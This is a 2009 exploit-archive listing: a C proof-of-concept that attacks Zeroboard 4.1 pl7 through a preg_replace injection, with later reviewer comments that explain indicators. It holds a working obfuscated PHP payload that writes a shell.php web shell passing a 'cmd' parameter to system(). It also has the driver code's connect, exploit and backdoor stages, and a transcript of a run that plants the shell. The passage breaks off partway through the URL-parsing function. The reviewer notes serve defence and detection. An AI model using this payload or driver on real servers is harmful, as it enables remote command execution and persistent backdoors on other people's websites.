zeroboard41-exec.txt
Posted on 04 September 2009
/*
 * poc by kyoungchip,jang
 * email : SpeeDr00t1004@gmail.com
 *
 * [*] the bug
 *  - http://www.xpressengine.com/15955761
 *
 * Application
 *  - Zeroboard 4.1 pl7
 *
 * Reference:
 *  - http://www.nzeo.com
 *  - Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada
 *
 * [*] Target - My test server
 *
 * $ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
 *  - Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
 *  - Target : http://xxx.xxx.xxx/zboard/bbs/shell.php?cmd=ls
 *
 * [+] xxx.xxx.xxx connecting ok!
 * [+] Exploiting zeroboard start
 *  - [+] Exploiting success!!
 *
 * [*] Create Backdoor Start
 *  - [+] Create Backdoor success!!
 *
 * [*] Confirmming your backdoor php script
 *  - http://192.168.179.6/zeroboard/zb41pl7/bbs/data/shell.php is generated!
 * [+] Exploiting success!!
 *  - http://192.168.179.6/zeroboard/bbs/data/shell.php?cmd=ls
 *
 * [+] Execute the websehll script
 */

/*
 * Reviewer notes (defensive reading of this listing):
 *  - Per the transcript above, a successful run leaves a shell.php on the
 *    server that takes a "cmd" request parameter. The transcript shows it
 *    under bbs/ and under bbs/data/, so both locations are worth checking
 *    on a board that may have been hit.
 *  - Request-side indicators visible in EXPLOIT_CODE below: client-supplied
 *    parameters named HTTP_SESSION_VARS[zb_last_connect_check],
 *    HTTP_SERVER_VARS and HTTP_ENV_VARS, together with a long
 *    chr(..).chr(..) chain. Legitimate clients have no reason to send these.
 *  - The page names Zeroboard 4.1 pl7 as the affected application and links
 *    a bug report (first URL above); it does not state a fixed version, so
 *    confirm the remediation against that report.
 *  - Only main() and the start of ParseZbHost() are visible in this excerpt;
 *    the stage functions declared below are defined elsewhere in the file.
 */

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/select.h>
#include <errno.h>

#define BUFSIZE 4096
#define READSIZE 1500

// Request payload as posted. The first chr() chain decodes to the relative
// path "./shell.php" and the mode "w+"; the second decodes to a one-statement
// PHP script that passes $cmd to system(). The trailing name=value pairs set
// HTTP_SESSION_VARS[zb_last_connect_check], HTTP_SERVER_VARS and
// HTTP_ENV_VARS from the client side.
// NOTE(review): presumably this depends on request parameters overwriting
// PHP globals on the target; the receiving code is not shown here, confirm
// against the referenced advisory.
#define EXPLOIT_CODE "*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1"

// Stage and helper functions; only ParseZbHost() begins within this excerpt.
void ParseZbHost(char *);
void ConnectZboard(char *, unsigned short);
void ExploitZboard(void);
void ConfirmPHPScript(void);
void CreateBackdoor(void);
void StatusProcess(void);
void Usage(char *);
void OutputErr(char *, int);

// Target description. zb_host is set in ParseZbHost(); zb_dir and zb_tid are
// not assigned anywhere in the visible code. As file-scope objects all three
// pointers start out NULL.
char *zb_host;
char *zb_dir;
char *zb_tid;
unsigned short zb_port;

int sockfd = -1;   // -1 until a socket exists (opened outside this excerpt)
int reconn=0;

// Fixed-size I/O buffers. TempBuf is sized with stdio's BUFSIZ, not the
// BUFSIZE macro defined above.
char ReadBuf[READSIZE];
char WriteBuf[BUFSIZE];
char TempBuf[BUFSIZ];
char no[16];

/*
 * Entry point: selects the port and target URL from the command line, then
 * runs the four stages in order (connect, exploit, create backdoor, confirm).
 *
 *   argc == 1  calls Usage(); whether Usage() exits is not visible here.
 *   argc == 2  port 80.
 *   argc == 3  argv[2] is the port, converted with atoi() (no error check).
 *   otherwise  nothing is parsed, so zb_host is still NULL and zb_port 0
 *              when ConnectZboard() is called.
 *
 * There is no return statement; under C99 and later main() then returns 0.
 */
int main(int argc, char *argv[])
{
    char *szArgv;

    switch( argc )
    {
        case 1 :
            Usage(argv[0]);
            break;
        case 2 :
            zb_port = 80;
            //szArgv = "http://192.168.179.6/zeroboard/zb41pl7/bbs/zboard.php?id=test";
            // NOTE(review): szArgv is never assigned on this path (its only
            // assignment is the commented-out line above), so this call
            // passes an indeterminate pointer: undefined behaviour as posted.
            ParseZbHost( szArgv );
            break;
        case 3:
            zb_port = atoi(argv[2]);
            ParseZbHost(argv[1]);
            break;
        default:
            break;
    };

    ConnectZboard(zb_host, zb_port);
    ExploitZboard();
    CreateBackdoor();
    ConfirmPHPScript();
}

// Parses the target URL given on the command line. Only the start of this
// definition is visible in this excerpt; it continues past the last line.
void ParseZbHost( char *zbhost )
{
    char *psbuf;
    char *sptr=NULL;
    char *eptr=NULL;

    // Work on a private copy so the argument string is left untouched.
    psbuf = ( char* )malloc( strlen( zbhost ) + 1 );
    strcpy( psbuf, zbhost );

    if( (sptr = strstr( psbuf , "http://" ) ) == NULL) OutputErr("http://host need ", 0);

    // Skip the 7-character "http://" prefix.
    zb_host = sptr + 7;
    sptr = strchr(zb_host, '/');
    sptr[0] = '